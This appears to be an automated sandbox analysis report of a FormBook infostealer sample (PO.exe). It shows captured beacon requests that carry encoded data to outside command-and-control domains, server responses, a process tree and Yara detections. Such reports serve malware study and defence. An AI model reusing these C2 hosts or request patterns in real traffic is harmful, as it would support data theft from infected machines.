                                                                                              Data Ascii: 92tD=T0aOyCVza4unFqdoyyWyL3dPl7o/0zHC5WW5nF1xMZunhaA2/1QL2WdaAevmOcCSrnCGmHEDiJDhv7CdnEAvtu/wT09aaH74BPyWUUdt2uNghlzgagi1gj58Xt5fpaUO3BR9L/MgLonBcgf2vhzxyvwsdP20wJZTn/eXY8pPEUDGgTQb2e729kj8N3pghHtzfh94WzH5Xf/3yEcaMxSU5IFripC7dypIGCqDtEVGh1jhH2Vur+ZdSsB/Erh7NJUDiMIWIyxBQbj5iVR8eJSEwyaFqPuK7iqknneBDgENgcWJSrhOJuY45D9jLcZv/nO6JOsZNV1VyTww+9Dm4RSok/Qk+w/BygzfIaiWn4QC5kFM4YkvMdvfZhKZSBXtb0Ow9Z5WI4Ru//FRqWGSrTJy/CH66ULQ3Ywzbtak6x6We9I2HPJte3k+Xc8ppSGSMQ0js/tZn8b3pk6HmanqOycPuERJlcobRhxbLRJUZtjx4gQEJiR9Xoc1UYvlqAB3kkIUiIvwLi3DUJw9D83YeBTC5YK65bDPXgJUtMeesc3w6GL27EPvn+fOrbdzIE85DGkvyAr1RwzZCEgFhD3Tam66g9RnSgmUgHnRz+vFlUI8vWGottKV4XzdRlqBan52i0O3vr1s+n+OAjUWySGLlQtZM2wZgTHUK6h4w3De72eR71GaMV/pk1YubplTJzyzwNOY+gO8F0MBtT+49cGdm/0sUugBC5siWCvBnhBAOldhE3JhB9zzzWWWNP35vK+G1rfGVKL9u1ECpcVgDq47herFiKOhMMFwJu/lCbQvmpN/GMGSaMKXA6i3giG2GbJmCtu8sqfaY8UBtYY7ocNuY0RKDY6ESrkmtkMx2liyq35DdYE7nzKWKpQHkgGrM1j1pT8MY4zZWkQ9NxsyAxLLiqMZcX7o8FijHTJ35Uw9N7xy5OcbDT3LeC2nE04bcSuV9pWaHjQdwWnVKCTRXWql0cJ3seez2YQRdJRLev3lX3cQb6fVZHd [TRUNCATED]
                                                                                              Feb 11, 2025 18:53:33.928595066 CET533INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 11 Feb 2025 17:53:33 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 389
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              12192.168.2.450021192.64.118.221805580C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Feb 11, 2025 18:53:35.679578066 CET452OUTGET /6wg4/?92tD=e2yux1VtJoqvcqg+8AukcEcVwMVT+Sjl/1eDxHdMS7mzrr0SxU8linEjJM3sYoPzrw66qF8Oj5XhrJTjkHQqvun9I0YvCDnVTdCWSCRzvr5pslrpMRangDo=&ODj=aVdxTb HTTP/1.1
                                                                                              Host: www.globalcase.website
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                                                                                              Feb 11, 2025 18:53:36.310945988 CET548INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 11 Feb 2025 17:53:36 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 389
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              13192.168.2.450022104.21.35.208805580C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Feb 11, 2025 18:53:41.637118101 CET715OUTPOST /wurw/ HTTP/1.1
                                                                                              Host: www.adjokctp.icu
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 201
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Origin: http://www.adjokctp.icu
                                                                                              Referer: http://www.adjokctp.icu/wurw/
                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                                                                                              Data Raw: 39 32 74 44 3d 4e 6c 37 31 31 35 52 4d 38 5a 4a 30 4a 6d 56 5a 74 41 75 6a 79 4d 6d 69 2f 63 74 6e 37 2b 51 70 7a 49 37 36 63 49 30 46 76 69 32 46 79 49 78 41 63 39 67 53 61 79 48 2b 6b 4a 65 62 6c 68 51 48 7a 75 4b 4a 68 43 73 4f 66 41 50 67 4e 67 47 54 36 58 74 67 78 2b 50 56 73 6a 57 53 72 57 6f 78 45 61 31 64 41 46 4a 65 76 63 62 4e 4a 58 4e 48 75 59 61 33 52 75 39 52 55 6b 4a 6f 6a 74 54 49 37 71 59 30 73 7a 70 4a 79 6a 39 55 34 4f 71 66 47 4e 36 44 73 49 33 75 64 47 36 43 45 2b 31 46 57 65 42 34 58 31 54 4a 7a 44 77 42 35 75 47 32 59 54 44 4f 42 37 65 43 4d 55 4d 4c 34 5a 42 39 67 51 3d 3d
                                                                                              Data Ascii: 92tD=Nl7115RM8ZJ0JmVZtAujyMmi/ctn7+QpzI76cI0Fvi2FyIxAc9gSayH+kJeblhQHzuKJhCsOfAPgNgGT6Xtgx+PVsjWSrWoxEa1dAFJevcbNJXNHuYa3Ru9RUkJojtTI7qY0szpJyj9U4OqfGN6DsI3udG6CE+1FWeB4X1TJzDwB5uG2YTDOB7eCMUML4ZB9gQ==
                                                                                              Feb 11, 2025 18:53:42.064608097 CET1236INHTTP/1.1 200 OK
                                                                                              Date: Tue, 11 Feb 2025 17:53:42 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              X-Address: gin_throttle_mw_7200000000_8.46.123.189
                                                                                              X-Ratelimit-Limit: 500
                                                                                              X-Ratelimit-Remaining: 498
                                                                                              X-Ratelimit-Reset: 1739299975
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C%2BbFWWk0NCq0lmB%2BD1%2B%2BfjZSpXs1KQz1i%2FXJtyJmeztwhxcNwmTn91wxOg%2BoffiQCSJzveIK1W%2Bj2GvUOPbbkf0AK3%2FkGiVw%2BZFjLFfI26i3bf%2Fh%2BqkYL2Qd4md30VGApwbW"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 9106332c5afc4252-EWR
                                                                                              Content-Encoding: gzip
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1534&min_rtt=1534&rtt_var=767&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=715&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                              Data Raw: 31 34 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 51 4d 6b 02 41 0c bd fb 2b 74 0e 65 06 b7 a3 d2 9b bb 6b 29 a5 b7 42 a1 1f a7 22 65 9c cd 8e 83 63 b2 64 b3 5a 11 ff 7b d9 da 56 7a 08 bc 07 c9 cb 7b 49 d1 7a 8e 8d 2c 06 09 64 08 25 c2 7e f8 f6 fc a8 f7 11 2b da db 44 de 49 24 b4 6b 86 da e4 60 1b 27 6b 74 5b 28 d5 44 d4 f8 c2 f3 7e 9c 4a b0 42 2f c2 11 83 36 39 ba 5d 0c 4e 88 ad 27 da 44 78 40 b7 4a 50 5d 5d 8d ea 0e 7d 2f ab c1 1c 6b 62 bd 73 3c a4 f2 5d 05 a2 90 60 45 a2 32 b5 8a 18 ce e8 e0 b0 82 cf 33 ae 3a bf e9 eb cc da d4 71 d3 f7 ba 58 75 6d 13 2b 60 95 a9 da f9 1f 8d e8 3e 1c fb 75 dc 01 ab 65 26 df f6 1e 69 0f 7c ef 5a d0 26 c3 72 9a 63 41 36 01 06 59 e7 38 1e 9b 58 6b b1 b1 5f f8 54 6b 7a c7 a5 59 5c cf 0c 83 74 8c a3 69 fe 03 66 27 7d 49 d7 b5 c0 77 01 50 cc 6d 0b f2 1a b7 40 9d 68 fd 17 d2 1c 2b f2 dd 16 50 fe df b3 a4 93 c9 66 70 63 e6
                                                                                              Data Ascii: 14aTQMkA+tek)B"ecdZ{Vz{Iz,d%~+DI$k`'kt[(D~JB/69]N'Dx@JP]]}/kbs<]`E23:qXum+`>ue&i|Z&rcA6Y8Xk_TkzY\tif'}IwPm@h+Pfpc
                                                                                              Feb 11, 2025 18:53:42.064634085 CET71INData Raw: 9e b0 a5 04 36 51 d0 6a 25 ca e4 83 62 f2 fb 98 41 d1 0c 5b 39 24 28 95 a7 44 3c 0f ec 0e b9 5a 30 54 91 c1 8b b5 b6 98 34 8b 2f 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 10 26 73 2a ca 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 6Qj%bA[9$(D<Z0T4/b&s*0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              14192.168.2.450023104.21.35.208805580C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Feb 11, 2025 18:53:44.200117111 CET735OUTPOST /wurw/ HTTP/1.1
                                                                                              Host: www.adjokctp.icu
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 221
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Origin: http://www.adjokctp.icu
                                                                                              Referer: http://www.adjokctp.icu/wurw/
                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                                                                                              Data Raw: 39 32 74 44 3d 4e 6c 37 31 31 35 52 4d 38 5a 4a 30 50 43 70 5a 72 6e 79 6a 7a 73 6d 6c 6a 73 74 6e 69 75 51 79 7a 50 7a 36 63 4e 4e 41 75 55 6d 46 7a 74 4e 41 4f 70 38 53 5a 79 48 2b 76 70 65 43 72 42 51 79 7a 75 57 33 68 44 41 4f 66 42 72 67 4e 6b 4b 54 36 41 5a 6e 33 2b 50 62 31 54 57 51 30 47 6f 78 45 61 31 64 41 46 64 30 76 63 54 4e 4b 6b 6c 48 76 39 32 32 66 4f 39 4f 64 45 4a 6f 30 64 54 4d 37 71 59 57 73 79 31 33 79 68 31 55 34 4c 57 66 47 63 36 45 6d 49 33 73 41 57 37 55 4b 75 45 4b 54 37 77 55 50 56 62 78 38 52 39 67 31 49 4c 73 4a 69 69 5a 54 37 36 78 52 54 46 2f 31 61 38 30 37 62 48 53 4e 55 33 30 77 62 53 66 32 4d 6b 50 2b 55 73 64 30 42 55 3d
                                                                                              Data Ascii: 92tD=Nl7115RM8ZJ0PCpZrnyjzsmljstniuQyzPz6cNNAuUmFztNAOp8SZyH+vpeCrBQyzuW3hDAOfBrgNkKT6AZn3+Pb1TWQ0GoxEa1dAFd0vcTNKklHv922fO9OdEJo0dTM7qYWsy13yh1U4LWfGc6EmI3sAW7UKuEKT7wUPVbx8R9g1ILsJiiZT76xRTF/1a807bHSNU30wbSf2MkP+Usd0BU=
                                                                                              Feb 11, 2025 18:53:44.837663889 CET1236INHTTP/1.1 200 OK
                                                                                              Date: Tue, 11 Feb 2025 17:53:44 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              X-Address: gin_throttle_mw_7200000000_8.46.123.189
                                                                                              X-Ratelimit-Limit: 500
                                                                                              X-Ratelimit-Remaining: 497
                                                                                              X-Ratelimit-Reset: 1739299975
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DIU0Icl8q2seHbkSbfot0rAKLxamInH9P%2BQSABm1V2lCCDAQ%2BUD7gE5SsTdYYQLbxtKtV08zJsA5MRwqNB8SBGTV3VlXzrHuZdUWEXE5NuqTywpGZrdaoZYF91X8y%2Bhe8QPR"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 9106333dce1b425c-EWR
                                                                                              Content-Encoding: gzip
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1590&rtt_var=795&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=735&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                              Data Raw: 31 35 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 51 4d 6b 02 41 0c bd fb 2b 74 0e 65 06 b7 a3 d2 9b bb 6b 29 a5 b7 42 a1 1f a7 22 65 9c cd 8e 83 63 b2 64 b3 5a 11 ff 7b d9 da 56 7a 08 bc 07 c9 cb 7b 49 d1 7a 8e 8d 2c 06 09 64 08 25 c2 7e f8 f6 fc a8 f7 11 2b da db 44 de 49 24 b4 6b 86 da e4 60 1b 27 6b 74 5b 28 d5 44 d4 f8 c2 f3 7e 9c 4a b0 42 2f c2 11 83 36 39 ba 5d 0c 4e 88 ad 27 da 44 78 40 b7 4a 50 5d 5d 8d ea 0e 7d 2f ab c1 1c 6b 62 bd 73 3c a4 f2 5d 05 a2 90 60 45 a2 32 b5 8a 18 ce e8 e0 b0 82 cf 33 ae 3a bf e9 eb cc da d4 71 d3 f7 ba 58 75 6d 13 2b 60 95 a9 da f9 1f 8d e8 3e 1c fb 75 dc 01 ab 65 26 df f6 1e 69 0f 7c ef 5a d0 26 c3 72 9a 63 41 36 01 06 59 e7 38 1e 9b 58 6b b1 b1 5f f8 54 6b 7a c7 a5 59 5c cf 0c 83 74 8c a3 69 fe 03 66 27 7d 49 d7 b5 c0 77 01 50 cc 6d 0b f2 1a b7 40 9d 68 fd 17 d2 1c 2b f2 dd 16 50 fe df b3 a4 93 c9 66 70 63 e6 9e b0 a5 04 36 51 d0 6a 25 ca e4 83 62 f2 fb 98
                                                                                              Data Ascii: 155TQMkA+tek)B"ecdZ{Vz{Iz,d%~+DI$k`'kt[(D~JB/69]N'Dx@JP]]}/kbs<]`E23:qXum+`>ue&i|Z&rcA6Y8Xk_TkzY\tif'}IwPm@h+Pfpc6Qj%b
                                                                                              Feb 11, 2025 18:53:44.837682962 CET50INData Raw: 41 d1 0c 5b 39 24 28 95 a7 44 3c 0f ec 0e b9 5a 30 54 91 c1 8b b5 b6 98 34 8b 2f 00 00 00 ff ff e3 02 00 10 26 73 2a ca 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: A[9$(D<Z0T4/&s*0


                                                                                              Click to jump to process

                                                                                              Click to jump to process

                                                                                              Click to dive into process behavior distribution

                                                                                              Click to jump to process

                                                                                              Target ID:0
                                                                                              Start time:12:51:38
                                                                                              Start date:11/02/2025
                                                                                              Path:C:\Users\user\Desktop\PO.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\PO.exe"
                                                                                              Imagebase:0xbc0000
                                                                                              File size:781'824 bytes
                                                                                              MD5 hash:351A691669ABF4DCBDB3F393B2F3E183
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:2
                                                                                              Start time:12:51:41
                                                                                              Start date:11/02/2025
                                                                                              Path:C:\Users\user\Desktop\PO.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\PO.exe"
                                                                                              Imagebase:0xa70000
                                                                                              File size:781'824 bytes
                                                                                              MD5 hash:351A691669ABF4DCBDB3F393B2F3E183
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2274480081.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2275144613.0000000001460000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2276815153.0000000001A10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:6
                                                                                              Start time:12:52:21
                                                                                              Start date:11/02/2025
                                                                                              Path:C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\lp0hQtG6P0.exe"
                                                                                              Imagebase:0x970000
                                                                                              File size:143'872 bytes
                                                                                              MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3003894654.00000000027B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:moderate
                                                                                              Has exited:false

                                                                                              Target ID:7
                                                                                              Start time:12:52:24
                                                                                              Start date:11/02/2025
                                                                                              Path:C:\Windows\SysWOW64\net.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\SysWOW64\net.exe"
                                                                                              Imagebase:0xc50000
                                                                                              File size:47'104 bytes
                                                                                              MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3001987219.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3003697143.0000000000970000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3003792289.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:8
                                                                                              Start time:12:52:39
                                                                                              Start date:11/02/2025
                                                                                              Path:C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\7Qeewu5lIKK.exe"
                                                                                              Imagebase:0x970000
                                                                                              File size:143'872 bytes
                                                                                              MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3003263592.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:moderate
                                                                                              Has exited:false

                                                                                              Target ID:9
                                                                                              Start time:12:52:51
                                                                                              Start date:11/02/2025
                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                              Imagebase:0x7ff6bf500000
                                                                                              File size:676'768 bytes
                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Reset < >